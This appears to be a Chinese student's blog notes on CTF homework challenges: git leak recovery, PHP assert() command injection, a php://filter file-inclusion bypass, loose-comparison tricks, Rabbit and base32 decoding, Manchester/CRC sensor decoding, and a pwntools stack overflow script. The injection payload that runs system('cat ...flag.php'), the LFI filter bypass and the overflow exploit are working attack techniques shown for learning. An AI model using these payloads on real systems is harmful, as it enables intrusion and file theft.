当前位置: 首页 > news >正文

1.20作业

1 mfw(git泄露)

./git,原本以为点了链接下了index文件,就可以打开看源码,结果解析不了

老老实实用了githacker

githacker --url      --output 1

assert()

断言(assert)的用法 | 菜鸟教程

命令注入:

/?page=').system('cat ./templates/flag.php');//

assert("strpos('templates/') or system('cat ./templates/flag.php');

//.php', '..') === false") or die("Detected hacking attempt!");

2 salted

53aaefcc805940d4b79a403127384d3d.png

base64解密,开头就是salted(AES DES RC4 Rabbit TripleDes)

c7b573216ce741969916395d8bb2ff6b.png

试了试是Rabbit

全是大写,base32解码;python转字符

hex_string=''
flag_string= ''.join(chr(int(hex_string[i:i+2], 16)) for i in range(0, len(hex_string), 2))
print(flag_string)

3 simple_php(松散比较)

>==,!==,(<>不等于,大于小于是松散比较)

(字符串和数字admin,1admin)(科学计数法0)(ture与非零字符串都是ture)

?a=0abc&b=1235abc

Web_php_include

strstr()函数:大小写敏感,用大写的PHP://来绕过过滤

/?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php

4 传感器2

百度一种可能:曼彻斯特编码

搜了搜wp:解析曼彻斯特编码实战-CSDN博客

删除3E可能是因为温度传感器解码后报文第一个字节为起始位,并无数据,因此从第二个字节开始,得到传感器1中两个解码后的报文有效数据为为0x24d8893ca5841000x24d8845abf34100

最后一个字节是校验位

然后涉及CRC校验攻防世界 Misc高手进阶区 7分题 传感器2_攻防世界传感器2-CSDN博客

5ezstack

·打开环境,nc连接checksec用相应ida打开附件:

1.定义了一个字符串v4且距离栈底0x20,有gets函数(危险,可通过此函数进行溢出)

2.发现/bin/sh地址,通过get函数【溢出到此处】,获取权限

from pwn import*

p=remote("node4.anna.nssctf.cn",28968)

payload=b'b'*(0x20+8)+p64(0x400730)

p.sendline(payload)

p.interactive()

相关文章:

  • github 怎么创建一个私有repository 并从另外一台电脑拉取下来更新
  • cuda安装
  • poi 的导入导出 报表
  • 聊聊istio服务网格
  • leetcode_位运算 191.位1的个数
  • 网络安全知识:网络安全网格架构
  • List的基本功能(1)
  • Java List 自定义对象排序 Java 8 及以上版本使用 Stream API
  • 服务器释放screen资源(Detached状态并不会释放资源)
  • C++ 设计模式 - 策略模式
  • 【SQL实验】触发器
  • 矩阵-矩阵置零
  • 并查集算法篇上期:并查集原理及实现
  • FreeSWITCH Alpine 安装
  • 【股票数据API接口35】如何获取股票当天分价成交占比数据之Python、Java等多种主流语言实例代码演示通过股票数据接口获取数据
  • 亚马逊的API服务怎么使用?
  • 力扣每日一题【算法学习day.131】
  • 【Erdas实验教程】009:非监督分类及分类后评价
  • TypeScript - 属性修饰符
  • Python 单例模式笔记
  • 苏州网站设计师招聘信息/谷歌浏览器安卓下载
  • 望野古诗拼音/什么是seo
  • 做网站 教程/市场营销策略有哪4种
  • 厦门市建设局网站住房保障/深圳靠谱网站建设公司
  • 北京网站制作定制/seo深度解析
  • 女人和男人做床上爱网站/宁波搜索引擎优化seo